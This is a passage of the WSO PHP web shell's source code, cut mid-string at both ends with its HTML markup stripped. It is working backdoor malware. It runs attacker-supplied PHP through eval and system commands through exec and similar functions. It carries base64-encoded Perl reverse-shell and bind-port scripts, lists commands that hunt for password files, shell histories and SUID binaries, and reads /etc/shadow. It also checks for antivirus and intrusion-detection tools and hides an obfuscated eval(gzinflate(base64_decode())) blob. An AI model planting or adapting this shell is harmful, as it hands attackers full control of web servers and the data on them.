'; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo ''.$_POST['p2'].' ({$num['n']} records) Page # '; echo ' of $pages'; if($_POST['p3'] > 1) echo ' < Prev'; if($_POST['p3'] < $pages) echo ' Next >'; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo '

'; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo '

'; echo '

'; if($_POST['type']=='mysql') { $db->query('SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y''); if($db->fetch()) echo '
Load file
'; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7'; $bind_port_p='IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0='; echo '

Network tools

Bind port to /bin/sh [perl]
Port:
Back-connect [perl]
Server: Port:

'; if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,'w') or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpp') { cf('/tmp/bp.pl',$bind_port_p); $out = wsoEx('perl /tmp/bp.pl '.$_POST['p2'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bp.pl').'
'; unlink('/tmp/bp.pl'); } if($_POST['p1'] == 'bcp') { cf('/tmp/bc.pl',$back_connect_p); $out = wsoEx('perl /tmp/bc.pl '.$_POST['p2'].' '.$_POST['p3'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bc.pl').'
'; unlink('/tmp/bc.pl'); } } echo '
'; wsoFooter(); } function actionRC() { if(!@$_POST['p1']) { $a = array( 'uname' => php_uname(), 'php_version' => phpversion(), 'wso_version' => WSO_VERSION, 'safemode' => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); exit; ?>'>aasa (0)
Password:
'); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == 'win') $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace('\\', '/', $home_cwd); $cwd = str_replace('\\', '/', $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( 'List Directory' => 'dir', 'Find index.php in current dir' => 'dir /s /w /b index.php', 'Find *config*.php in current dir' => 'dir /s /w /b *config*.php', 'Show active connections' => 'netstat -an', 'Show running services' => 'net start', 'User accounts' => 'net user', 'Show computers' => 'net view', 'ARP Table' => 'arp -a', 'IP Configuration' => 'ipconfig /all' ); else $aliases = array( 'List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name \'config*\'', 'find config* in current dir' => 'find . -type f -name \'config*\'', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' =>'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf'=>'locate '.conf'', 'locate .pwd' => 'locate '.pwd'', 'locate .sql' => 'locate '.sql'', 'locate .htpasswd' => 'locate '.htpasswd'', 'locate .bash_history' => 'locate '.bash_history'', 'locate .mysql_history' => 'locate '.mysql_history'', 'locate .fetchmailrc' => 'locate '.fetchmailrc'', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv' ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo '' . $_SERVER['HTTP_HOST'] . ' - WSO ' . WSO_VERSION .'
'; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = '?'; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode('/', $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= ''.$path[$i].'/'; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '[ '.$k.' ]'; $drives = ''; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } echo '' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER['SERVER_ADDR'] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
';eval(gzinflate(base64_decode('dZJNc5swEIb/iieTQ3ITuInLZHrAuBIrx9SA+dLFAxbBssRHQxMX//qqJk4y0+lhR6PZffTuu6vrrn3+tS1Ew7d88m1yRV3W7UyFssG2wAmefGStQ6RwMlAzT72OuyuRbnrPqVUNTiV5rU55GhxggXQ9iGU4ny38ttLsWE9Wlc5Vq4VmhF1d3i+mUK1DW6aGhyPFdPQikrG3MQKcIvw9wDDqnBmuMn2CY//DhDiIImzBxvAiUOii3RV1e67/q02xtQlimugoQFEcxTGOjOApjin9xKAspQ1L/TOzq/GUp7RnJD4UZqCWTjBlCbxQol5yIS/MT54ERvGmA0r3qbyWJb97IHvEXfv+cfgqOcEDM2MEhN59zMUa4PDmj9BX5sqLP+E3cfND2P/l1oQOawFjD+S8hz1LjCN3ZTvOSnbg9pVPjH2eHFuosxNbzE+rKTV12DmxUJHgrnDutDckHt99HGVWW7IM5Qxc5DmNjjrud2ZUlYP9vuvl0I95OT8xfS9M6zlPohaacbelgP7jH8nZ1cOkfM3VTZH35f2XLS93LS9vrj/9vNvbhz8= '))); } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?' (Writeable)':' (Not writable)'; echo '
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

'; } if (!function_exists('posix_getpwuid') && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists('posix_getgrgid') && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join('\n',$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,'r'))) { $out = ''; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf('%u', $s); if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists('scandir')) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, '\n') === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = 'MySql ('.mysql_get_client_info().')'; if(function_exists('mssql_connect')) $temp[] = 'MSSQL'; if(function_exists('pg_connect')) $temp[] = 'PostgreSQL'; if(function_exists('oci_connect')) $temp[] = 'Oracle'; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?'yes [view]':'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?'yes [view]':'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
posix_getpwuid ('Read' /etc/passwd)
From
To
'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ''; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid).'\n'; } echo '
'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = 'document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='' . addcslashes(htmlspecialchars(ob_get_clean()), '\n\r\t\\'\0') . '';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
'; } echo '

Execution PHP-code

'; echo ' send using AJAX
';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '
'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo 'Can't upload!'; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo 'Can't create!'; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == '..') || (basename($item) == '.') ) continue; $type = filetype($item); if ($type == 'dir') deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '

File manager

'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo ' '; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, 'wsoCmp'); usort($dirs, 'wsoCmp'); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo '
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');' ' . (empty ($f['link']) ? '' : 'title='{$f['link']}'') . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').'
 '; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo 'file name:  '; echo '
'; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = 'document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML=''.addcslashes(htmlspecialchars(ob_get_clean()),'\n\r\t\\'\0').'';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '

String conversions

'; echo '
send using AJAX
';
    if(!empty($_POST['p1'])) {
        if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo'

Search files:

Text:
Path:
Name:
'; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo ''.htmlspecialchars($item).'
'; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo '

Search for hash:





'; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename='.basename($_POST['p1'])); if (function_exists('mime_content_type')) { $type = @mime_content_type($_POST['p1']); header('Content-Type: ' . $type); } else header('Content-Type: application/octet-stream'); $fp = @fopen($_POST['p1'], 'r'); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = 'edit'; fclose($fp); } } } wsoHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
';
